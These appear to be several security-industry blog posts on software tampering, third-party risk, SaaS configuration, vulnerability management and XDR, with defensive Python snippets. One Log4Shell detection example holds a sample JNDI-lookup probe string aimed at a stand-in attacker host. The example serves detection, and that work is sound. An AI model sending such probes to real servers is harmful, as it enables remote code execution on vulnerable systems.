It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The SolarWinds breach and the disclosure of the massive Log4J vulnerability have put company decision makers on high alert with respect to this freshly-minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the SolarWinds breach, for instance, tampered with a build system of the widely-used Orion network management tool. They then were able to trick some 18,000 companies into deploying an authentically-signed Orion update carrying a heavily-obfuscated backdoor.

Log4J, aka Log4Shell, refers to a gaping vulnerability that exists in an open-source logging library that’s deeply embedded within servers and applications all across the public Internet. Its function is to record events in a log for a system administrator to review and act upon. Left unpatched, Log4Shell presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.
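
To make the mechanics a bit more concrete, here is a minimal, purely illustrative Python sketch of the kind of pattern matching defenders leaned on as a stopgap while patching: it flags request or log lines that carry the plain ${jndi:...} lookup string Log4Shell abuses. Real-world scanners also handle nested and obfuscated variants; the sample strings below are hypothetical.

```python
import re

# Flag log or request fields carrying the JNDI lookup pattern that Log4Shell
# abuses (e.g. "${jndi:ldap://attacker.example/a}"). Illustrative only; real
# scanners also catch nested and obfuscated variants.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def flag_suspicious(lines):
    """Return the lines that contain a plain JNDI lookup string."""
    return [line for line in lines if JNDI_PATTERN.search(line)]

if __name__ == "__main__":
    sample = [
        "GET /search?q=${jndi:ldap://attacker.example/a} HTTP/1.1",  # hypothetical probe
        "GET /healthz HTTP/1.1",
    ]
    for hit in flag_suspicious(sample):
        print("possible Log4Shell probe:", hit)
```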

This type of attack takes advantage of the highly dynamic, ephemeral way software interconnects to make modern digital services possible.

Pericin

“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion can arise anytime a developer reaches out to a package repository. Modern software is built on pillars of open-source components, and package repositories offer easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements, and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a back door through which they can come and go – and take full control of the underlying system anytime they please, Pericin says.
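
Here is a hedged illustration of why the confusion works, framed as a simple defensive check: if a package name your developers treat as internal also resolves on the public index, someone else may already have claimed it; if it does not resolve, it is still claimable by an attacker, which is why many organizations register placeholders. The internal package names below are made-up placeholders.

```python
import urllib.error
import urllib.request

# Hypothetical internal package names; replace with your organization's own.
INTERNAL_PACKAGES = ["acme-billing-core", "acme-internal-auth"]

def exists_on_pypi(name: str) -> bool:
    """Return True if the public PyPI index serves metadata for this name."""
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise

if __name__ == "__main__":
    for pkg in INTERNAL_PACKAGES:
        if exists_on_pypi(pkg):
            print(f"WARNING: '{pkg}' also exists on public PyPI -- verify who owns it")
        else:
            print(f"'{pkg}' is not on public PyPI -- consider registering a placeholder")
```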

Last year, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to tamper with coding deep inside of system software at Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current operating environment, there’s limitless opportunity to tamper with code. This is because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising – due to their intensive use of third-party and open-source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that their applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize the documentation of a complete list of authorized components in a software application.
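
As a rough illustration of what that documentation looks like in practice, here is a trimmed, CycloneDX-style SBOM sketched in Python; the component names and versions are hypothetical, and real SBOMs carry far more metadata such as hashes, package URLs and licenses.

```python
import json

# A trimmed, CycloneDX-style SBOM: a declared inventory of the open-source
# components a build pulled in, so they can be checked against advisories.
sbom = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "log4j-core", "version": "2.14.1"},
        {"type": "library", "name": "jackson-databind", "version": "2.13.2"},
    ],
}

def components_matching(sbom_doc, name):
    """Return the components in the SBOM with the given name."""
    return [c for c in sbom_doc["components"] if c["name"] == name]

if __name__ == "__main__":
    print(json.dumps(sbom, indent=2))
    # A simple advisory check: is the vulnerable logger present at all?
    print("log4j-core entries:", components_matching(sbom, "log4j-core"))
```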

President Biden’s cybersecurity executive order, issued in May 2021, includes a detailed SBOM requirement for all software delivered to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

 

Third-Party Risk Management (TPRM) has been around since the mid-1990s – and has become something of an auditing nightmare.

Related: A call to share risk assessments

Big banks and insurance companies instilled the practice of requesting their third-party vendors to fill out increasingly bloated questionnaires, called bespoke assessments, which they then used as their sole basis for assessing third-party risk.

TPRM will be in the spotlight at the RSA Conference 2022 next week in San Francisco. This is because third-party risk has become a huge problem for enterprises in the digital age. More so than ever, enterprises need to move beyond check-the-box risk assessments; there’s a clear and present need to proactively mitigate third-party risks.

The good news is that TPRM solution providers are innovating to meet this need, as will be showcased at RSA. One leading provider is Denver, Colo.-based CyberGRX. I had the chance to sit down with their CISO, Dave Stapleton, to learn more about the latest advancements in TPRM security solutions. For a full drill down of our discussion, please give the accompanying podcast a listen. Here are key takeaways:

Smoothing audits

CyberGRX launched in 2016 precisely because bespoke assessments had become untenable. Questionnaires weren’t standardized, filling them out and collecting them had become a huge burden, and any truly useful analytics just never happened.

“Sometimes you’d get a 500-question questionnaire and that would be one out of 5,000 you’d get over the course of a year,” Stapleton says, referring to a scenario that a large payroll processing company had to deal with.

CyberGRX created an online exchange to serve as a clearinghouse where assessments could be more efficiently – and usefully – administered. Digital transformation had taken hold; so their timing was pitch perfect.

“Usage of third-party vendors has escalated exponentially in the past 10 years, and businesses also rely on them for more sensitive and critical activities,” Stapleton noted.

Moving the questionnaires to an exchange model meant introducing a standardized crowdsourcing approach to compiling and making available what was previously bespoke assessment data. This also made remediation – i.e. getting third-party vendors to mitigate potential risks and maintain compliance with audit benchmarks – much smoother.

Stapleton

This alone was a huge improvement. “The exchange model has been quite revolutionary,” Stapleton says. “We were able to reduce the level of effort for both third parties and their customers. Third parties get fewer requests so they can focus more time and energy on security; customers have one place they can go to get the data they need.”

Cyber risk profiling

CyberGRX’s global cyber risk Exchange caught on quickly. But the company founders never intended to stop at simply cleaning up bespoke assessments. The exchange has proven to be a perfect mechanism for fleshing out much richer cyber risk profiles of third-party vendors. It does this by ingesting and correlating data from a wide array of security-related datasets.

This folds in fresh intelligence that goes far beyond the ground covered in traditional bespoke assessments, which are merely the starting point. Questionnaire answers get cross referenced against cybersecurity best practice protocols put out by the National Institute of Standards and Technology, namely NIST 800-53 and NIST 800-171.
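
Conceptually, that cross-referencing can be pictured as a simple mapping exercise, sketched below in Python. The questions, answers and NIST control identifiers are illustrative placeholders, not CyberGRX’s actual assessment content.

```python
# Hypothetical mapping from questionnaire items to NIST control identifiers.
QUESTION_TO_CONTROL = {
    "mfa_for_remote_access": "NIST 800-53 IA-2(1)",
    "encrypts_data_at_rest": "NIST 800-171 3.13.16",
    "quarterly_access_reviews": "NIST 800-53 AC-2",
}

def control_gaps(answers: dict) -> list:
    """Return the controls whose mapped questions were answered 'no'."""
    return [
        control
        for question, control in QUESTION_TO_CONTROL.items()
        if answers.get(question) is False
    ]

if __name__ == "__main__":
    vendor_answers = {
        "mfa_for_remote_access": True,
        "encrypts_data_at_rest": False,
        "quarterly_access_reviews": False,
    }
    print("Potential control gaps:", control_gaps(vendor_answers))
```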

CyberGRX is also able to leverage real-time threat intelligence feeds by partnering with leading threat intelligence vendors. These vendors integrate their abilities to monitor malware circulation and cyber-attack activity in real time within the Exchange platform, including staying alert for any signs of third-party vendor cyber assets turning up in murky parts of the Dark Web.

Another function of the Exchange is to analyze a third-party vendor’s “firmographics” – publicly known details such as geographic location, industry type, target markets, business performance and organizational structure. So contextual industry background and fresh threat landscape intel gets continually infused into traditional audit findings. Stapleton characterizes this as “cyber risk intelligence” profiling.

“The idea behind it is that this is a process of collecting the right data, creating your own quality data and performing very complex analysis in order to produce actionable results,” he says.

Cyber hygiene boost

This enrichment of the check-the-box approach to third-party risk assessments is paying off on a number of levels, he says. Material productivity gains derive from risk managers on both sides spending much less time mucking with bespoke audits. “Our methodology provides security and risk professionals with next-level insights that empower them to quickly make decisions in regards to risk management, spending less time on mitigating risks and more time focusing on other important initiatives,” Stapleton says.

More nuanced benefits accrue, as well. For instance, as more substantive vetting of third-party vendors gains traction, the overall level of supply chain cyber hygiene gets boosted. Third parties quickly discover that checking boxes isn’t going to be enough; first-party enterprises gain clarity, in a very practical sense, on security practices they need to prioritize.

Observes Stapleton:  “It’s a combination of capabilities that produces something that is truly actionable, specifically for the purposes of improving third party risk management outcomes.”

The ceiling for strengthening security postures – of third parties and first parties alike — is high. For instance, Stapleton described for me how CyberGRX can now correlate firmographics to threat intel feeds and audit data to provide innovative new services that were unheard of just a couple of years ago.

For one, the exchange can now reliably predict how a vendor will respond to a risk assessment without having them input any information. Thus, an enterprise can weigh whether to accept a given supplier — without necessarily administering a full-blown assessment audit.

For another, the exchange is continually improving its capacity to granularly gauge a third-party vendor’s exposure to a high-profile vulnerability or even a certain type of exploit known to be circulating in the wild.

“We can map to something like the MITRE ATT&CK framework and perform an analysis that tells you which of your third parties are most likely to be vulnerable to something like Log4J.”
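
A hedged sketch of that mapping idea: recorded exposures for each third party get tied to MITRE ATT&CK technique IDs, so an enterprise can ask which vendors look most exposed to a Log4J-style attack. The vendor names, exposures and mappings below are hypothetical, not CyberGRX’s actual data model.

```python
# Hypothetical exposures mapped to MITRE ATT&CK techniques.
EXPOSURE_TO_TECHNIQUE = {
    "unpatched_log4j": "T1190 Exploit Public-Facing Application",
    "internet_exposed_rdp": "T1133 External Remote Services",
}

# Hypothetical third-party portfolio and their known exposures.
THIRD_PARTIES = {
    "logistics-vendor": ["unpatched_log4j"],
    "payroll-vendor": ["internet_exposed_rdp"],
    "print-shop": [],
}

def vendors_exposed_to(exposure: str) -> list:
    """Return third parties whose recorded exposures include `exposure`."""
    return [name for name, exposures in THIRD_PARTIES.items() if exposure in exposures]

if __name__ == "__main__":
    print("Technique:", EXPOSURE_TO_TECHNIQUE["unpatched_log4j"])
    print("Likely exposed vendors:", vendors_exposed_to("unpatched_log4j"))
```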

What’s more, advanced third-party risk mitigation can also help offset the cybersecurity skills shortage. “We’re putting our security professionals back to work instead of filling out spreadsheets,” Stapleton asserts, “and we’re giving enterprises information they can use to start working with their third parties today to improve security of the supply chain.”

This is one part of igniting a virtuous cycle. New cloud-centric security frameworks, like Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE), and new security tools – to advance detection and response, as well as properly configure all cyber assets – must take hold as well. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM). SSPM is part of an emerging class of security tools that are being ramped up to help companies dial in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud guaranteed that the hosted IT infrastructure they sought to rent to enterprises would be security-hardened – at least on their end. For subscribers, the tech giants issued a sprawling set of security settings for their customers’ security teams to monkey with. It was left up to each company to dial-in just the right amount of security-vs-convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.

Bin

What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology recognized this huge security gap for what it was, and issued NIST 800-53 and NIST 800-171 – detailed criteria for securely configuring cloud connections. But many companies simply shrugged off the NIST protocols.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One or SolarWinds or Colonial Pipeline.

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.
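
To picture how such a tool reasons about settings, here is a minimal, purely illustrative Python sketch of an SSPM-style check: each SaaS app’s configuration gets compared to a desired baseline and any drift is flagged for ticketing. The app names, settings and baseline are hypothetical, not Adaptive Shield’s actual rule set.

```python
# Hypothetical baseline of desired SaaS security settings.
BASELINE = {
    "mfa_required": True,
    "anti_phishing_policy": True,
    "public_link_sharing": False,
}

# Hypothetical snapshot of current settings per SaaS application.
SAAS_SETTINGS = {
    "crm-app": {"mfa_required": True, "anti_phishing_policy": True, "public_link_sharing": True},
    "video-conf": {"mfa_required": False, "anti_phishing_policy": True, "public_link_sharing": False},
}

def find_misconfigurations(settings: dict, baseline: dict) -> list:
    """Return (app, setting) pairs that deviate from the baseline."""
    drift = []
    for app, config in settings.items():
        for key, expected in baseline.items():
            if config.get(key) != expected:
                drift.append((app, key))
    return drift

if __name__ == "__main__":
    for app, setting in find_misconfigurations(SAAS_SETTINGS, BASELINE):
        print(f"open a ticket: {app} -> {setting} is out of policy")
```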

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations is huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Vulnerability management, or VM, has long been an essential, if decidedly mundane, component of network security.

Related: Log4J’s long-run risks

That’s changing — dramatically. Advanced VM tools and practices are rapidly emerging to help companies mitigate a sprawling array of security flaws spinning out of digital transformation.

I visited with Scott Kuffer, co-founder and chief operating officer of Sarasota, FL-based Nucleus Security, which is in the thick of this development. Nucleus launched in 2018 and has grown to over 50 employees. It supplies a unified vulnerability and risk management solution that automates vulnerability management processes and workflows.

We discussed why VM has become acutely problematic yet remains something that’s vital for companies to figure out how to do well, now more so than ever. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Multiplying exposures

Scan and patch. Historically, this has been what VM was all about. Microsoft’s Patch Tuesday speaks to the never-ending flow of freshly discovered software flaws — and the software giant’s best efforts to ease the burden of mitigating them.

Scan-and-patch systems from Tenable, Qualys, Rapid7, Checkmarx and others came along and became indispensable; enterprises could use these tools to keep software bugs and security holes patched at a tolerable level – not just flaws in Microsoft code, of course, but in software from all of their suppliers, internal and external.

However, that scan-and-patch equilibrium is no more. Digital transformation has spawned a cascade of nuanced, abstract vulnerabilities – and they’re everywhere. This results from companies chasing after agile software development and cloud-centric innovations, above all else. In aggressively leveraging digital services to achieve productivity gains they’ve also exponentially multiplied security gaps across a steadily expanding network attack surface.

“There are configuration weaknesses in cloud resources, vulnerabilities that need patching,  like Log4J, and vulnerabilities in the business logic of old code,” Kuffer observes. “There are many different types of these vulnerabilities, and it’s a matter of figuring out who owns them and how to fix them quickly, and, also, which ones to fix.”

Current threat landscape

So, what exactly constitutes a vulnerability these days? As Kuffer alluded to not long into our discussion, it goes far beyond the bug fixes and security patches that Microsoft, Oracle, Adobe and every supplier of business software distributes periodically.

Kuffer

A vulnerability, simply put, is a coding weakness by which software can be manipulated in a way that was never intended. Today, these exposures lurk not just in the legacy enterprise apps – the ones that need continually patching – they’re turning up even more so in the cloud-hosted storage buckets, virtual servers and Software-as-a-Service (SaaS) subscriptions that have become the heart of IT operations.

It all starts with DevOps, under which agile software is being pushed out based on the principle of continuous integration and continuous delivery (CI/CD). Much heralded, CI/CD is a set of principles said to result in the delivery of new software frequently and reliably.

Truthfully, CI/CD really is nothing more than an updated version of rushing shrink-wrapped boxes of new apps to store shelves. Remember when early adopters were giddy to receive the bug-riddled version 1.0 of a cool new app, anticipating that major bugs would get fixed in 1.1, 1.2 etc.?

Under CI/CD, developers collaborate remotely to press new code into live service as fast as possible and count on making iterative fixes on the fly.

This fail-fast imperative often leverages cloud storage and virtual servers; code development revolves around interconnecting modular microservices and software containers scattered all across public and private clouds.

To malicious hackers this translates into a candy store of fresh vulnerabilities. In many ways it’s easier than ever for threat actors to get deep access, steal data, spread ransomware, disrupt infrastructure and attain long run unauthorized access.

Unified solution

All of that said, it’s not so much the agile software trend, in and of itself, that’s to blame. Security gaps generally — and vulnerabilities specifically — have surpassed the tolerable level in large part because companies have not paid nearly enough attention to configuring their public cloud and hybrid cloud IT systems. In short, software interconnections are skewed toward agility.

Fine tuning is in order and there’s really no mystery how to go about dialing in the necessary measure of security. Robust data security frameworks have been painstakingly assembled and vetted by the National Institute of Standards and Technology (NIST). However, adhering to NIST 800-53 and NIST 800-171 is voluntary and, for whatever reasons, far too many enterprises have yet to fully embrace robust data security best practices.

To illustrate, Kuffer pointed me to the all-too-common scenario where a company goes live with an AWS root account that uses a default password to access all of its EC2 virtual servers and S3 storage buckets. “That misconfiguration is a vulnerability because anybody who finds that password and then logs in to your AWS account has full admin control over your entire cloud infrastructure,” he says.
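
Here is a hedged sketch of that kind of misconfiguration hunting using the AWS SDK for Python (boto3, assumed to be installed with credentials configured): it lists S3 buckets whose ACLs grant access to everyone and checks whether the account root user has MFA enabled. It is illustrative, not a complete audit.

```python
import boto3  # assumes boto3 is installed and AWS credentials are configured

# ACL grantee URIs that make a bucket readable by the world or by any AWS user.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def public_buckets(s3):
    """Return bucket names whose ACL grants access to a public group."""
    names = []
    for bucket in s3.list_buckets()["Buckets"]:
        acl = s3.get_bucket_acl(Bucket=bucket["Name"])
        for grant in acl["Grants"]:
            if grant["Grantee"].get("URI") in PUBLIC_GROUPS:
                names.append(bucket["Name"])
                break
    return names

if __name__ == "__main__":
    s3 = boto3.client("s3")
    iam = boto3.client("iam")
    print("Publicly readable buckets:", public_buckets(s3))
    summary = iam.get_account_summary()["SummaryMap"]
    if not summary.get("AccountMFAEnabled"):
        print("Root account has no MFA enabled -- high-risk misconfiguration")
```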

This kind of thing can be rectified by adopting risk-assessment principles alongside CI/CD. And the good news, Kuffer says, is that the cybersecurity industry is driving towards helping companies get better at systematically identifying, analyzing and controlling vulnerabilities. Nucleus Security refers to this as a shift toward vulnerability management viewed through a risk-assessment lens.

Risk-tolerance security

VM done from a risk-assessment lens boils down to enterprises making a concerted effort to discover and thoughtfully inventory all of the coding flaws and misconfigurations inhabiting their increasingly cloud-centric networks, and then doing triage based on risk-tolerance principles.
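
A minimal sketch of that triage logic, with made-up findings and weights: each issue gets a simple risk score based on severity, asset criticality and exposure, and only findings above the organization’s stated risk tolerance jump to the front of the queue.

```python
RISK_TOLERANCE = 6.0  # hypothetical threshold: anything above this gets fixed first

# Hypothetical findings drawn from scanners and cloud configuration checks.
findings = [
    {"id": "CVE-2021-44228", "severity": 10.0, "asset_criticality": 0.9, "internet_facing": True},
    {"id": "weak-tls-internal", "severity": 5.3, "asset_criticality": 0.4, "internet_facing": False},
]

def risk_score(finding: dict) -> float:
    """Severity weighted by how critical and how exposed the asset is."""
    exposure = 1.0 if finding["internet_facing"] else 0.5
    return finding["severity"] * finding["asset_criticality"] * exposure

if __name__ == "__main__":
    for finding in sorted(findings, key=risk_score, reverse=True):
        score = risk_score(finding)
        action = "fix now" if score > RISK_TOLERANCE else "schedule"
        print(f"{finding['id']}: score={score:.1f} -> {action}")
```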

This absolutely can be done, ironically, because cybersecurity vendors themselves are innovating off the strengths of cloud resources and agile software. At RSA Conference 2022 opening next week in San Francisco, there will be considerable buzz around new tools and frameworks that empower companies to discover and inventory software bugs and misconfigurations, cost-effectively and at scale.

This includes a host of leading-edge technologies supporting emerging frameworks such as cyber asset attack surface management (CAASM), cloud security posture management (CSPM), application security posture management (ASPM) and even software-as-a-service security posture management (SSPM).

Specialized analytics platforms — like those from Nucleus Security and other suppliers of advanced VM technologies – fit in by enabling companies to ingest security posture snapshots from all quarters, Kuffer says. Advanced VM systems are designed to efficiently implement and enforce wise policy, without unduly disrupting agility, he says.

Clearly, the frameworks and technology are ready for prime time. If the continuing ransomware scourge and widening supply chain hacks tell us anything, it’s that it’s high time for companies to dial back on agility and dial in more security. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

According to recent data from Oracle and KPMG, organizations today employ over 100 cybersecurity products to secure their environments. These products play essential roles in detecting and preventing threats.

Related: Taking a ‘risk-based’ approach to security compliance

However, because they generate thousands of alerts every day, this vast sprawl of security sources adds even more work to already over-stretched security teams. It could create a cybersecurity ticking time bomb.

Many organizations have recently undertaken rapid digital transformations in response to the ongoing pandemic and a societal shift toward a “work from anywhere” future. This hybrid model has created exciting opportunities for employees and organizations and significantly raised the security stakes.

Most combine the cloud, Office 365, and Active Directory to store and transfer sensitive corporate data, and they need security solutions to protect their entire environment as it grows and evolves. The once “protective perimeter” surrounding enterprise IT has dissolved, transforming it from a closed environment into one that spans far and wide with copious entry points.

To address this security challenge, organizations are deploying more security products today. This seems to be creating new problems in vendor sprawl, further burdening security teams with more to do. The challenge is that disparate vendors do not represent data in the same way, so there is no correlation between dashboards and metrics.

When organizations have two or three security platforms protecting their environment, security teams must toggle between them and make sense of disparate data sets. This often results in a lack of clarity, inhibiting them from seeing the big picture of what is really happening in their security environment. This is why cyber gangs tend to favor layered attacks. They’re harder to identify across disparate security data sets.

Espinosa

All security technologies have their own alerting systems, requirements for patches and updates, integration needs, user nuances, policy management processes, access control, reporting, etc. This can become overwhelming for security teams, often understaffed and under-resourced, resulting in missed alerts – some insignificant, others critical.

Too many tools, too little time

So, how best to overcome this challenge? As organizations’ environments continue expanding, how best to improve security across the entire infrastructure without creating vendor sprawl or overburdening security teams?

One tool picking up prominence is Extended Detection and Response (XDR).

XDR is one of the latest acronyms to hit the cyber dictionary, and it is a new approach to threat detection and response. It provides holistic protection against cyberattacks across an organization’s entire digital estate, including endpoints, applications, networks, and cloud environments.

While the tool is often confused with Managed Detection and Response (MDR), Security Information and Event Management (SIEM), and Endpoint Detection and Response (EDR), it is very different as it builds upon each offering, rolling them into a single package to help organizations better secure their environments as digital transformation accelerates.

While EDR, MDR, and SIEM provide visibility into specific areas, by choosing just one, organizations are not necessarily improving their overall security posture against potential attack vectors because visibility is still limited to only the area that the solution is monitoring.

With EDR, the solution only looks for threats or security issues impacting organizations’ endpoints. Historically, when organizations’ primary attack vectors were PCs, this would have provided adequate security. However, attacks target multiple different sources today, so threat hunting and protection must secure everything.

XDR meets evolving security needs

Rather than deploying multiple tools from multiple security vendors, XDR combines endpoint, network, applications, and cloud architecture monitoring and response capabilities into one platform, allowing better correlation of security events and freeing security teams from vendor sprawl. With cyberattacks growing year-on-year, organizations simply do not have the manpower or resources to combat threats.
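
The correlation idea at the heart of XDR can be sketched in a few lines: alerts from endpoint, network and cloud tooling get normalized, grouped by the entity they involve, and promoted to an incident when multiple sources fire within a short window. The alerts below are invented for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical, already-normalized alerts from three different tool categories.
alerts = [
    {"source": "endpoint", "entity": "host-42", "time": datetime(2022, 6, 1, 10, 0)},
    {"source": "network", "entity": "host-42", "time": datetime(2022, 6, 1, 10, 4)},
    {"source": "cloud", "entity": "host-42", "time": datetime(2022, 6, 1, 10, 7)},
    {"source": "endpoint", "entity": "host-77", "time": datetime(2022, 6, 1, 11, 0)},
]

def correlated_incidents(alerts, window=timedelta(minutes=15), min_sources=2):
    """Group alerts per entity and keep groups seen by multiple tools in-window."""
    by_entity = defaultdict(list)
    for alert in alerts:
        by_entity[alert["entity"]].append(alert)
    incidents = []
    for entity, group in by_entity.items():
        group.sort(key=lambda a: a["time"])
        span = group[-1]["time"] - group[0]["time"]
        sources = {a["source"] for a in group}
        if len(sources) >= min_sources and span <= window:
            incidents.append((entity, sorted(sources)))
    return incidents

if __name__ == "__main__":
    for entity, sources in correlated_incidents(alerts):
        print(f"single incident for {entity}: corroborated by {sources}")
```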

To bridge the gap, holes are plugged with new security products. While these are beneficial in threat detection, most products are from different vendors, which means there is no unified way to receive alerts. This results in strained security teams wasting time navigating through the mechanics of each security tool.

One of the best ways to overcome this issue is through XDR technology, the next evolution in threat detection and response. XDR’s capabilities protect organizations’ entire digital estates as they grow beyond the safety of their perimeter.

XDR can consolidate multiple toolsets and alerting systems into a single, integrated solution and provide rapid response against threats targeting any part of an organization’s infrastructure. Security teams can then identify and investigate alerts quickly from a single source, and act before threats can harm the business, without being overburdened.

About the essayist: Christian Espinosa is the managing director of Cerberus Sentinel, a Managed Compliance and Cybersecurity Provider (MCCP) with its exclusive MCCP+ managed compliance and cybersecurity services plus culture program. He also is the best-selling author of “The Smartest Person in the Room.” Espinosa came to Cerberus Sentinel after the company acquired Alpine Security, a cybersecurity consulting and managed services company he founded. He also has been a white hat hacker and a certified high-performance coach.

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

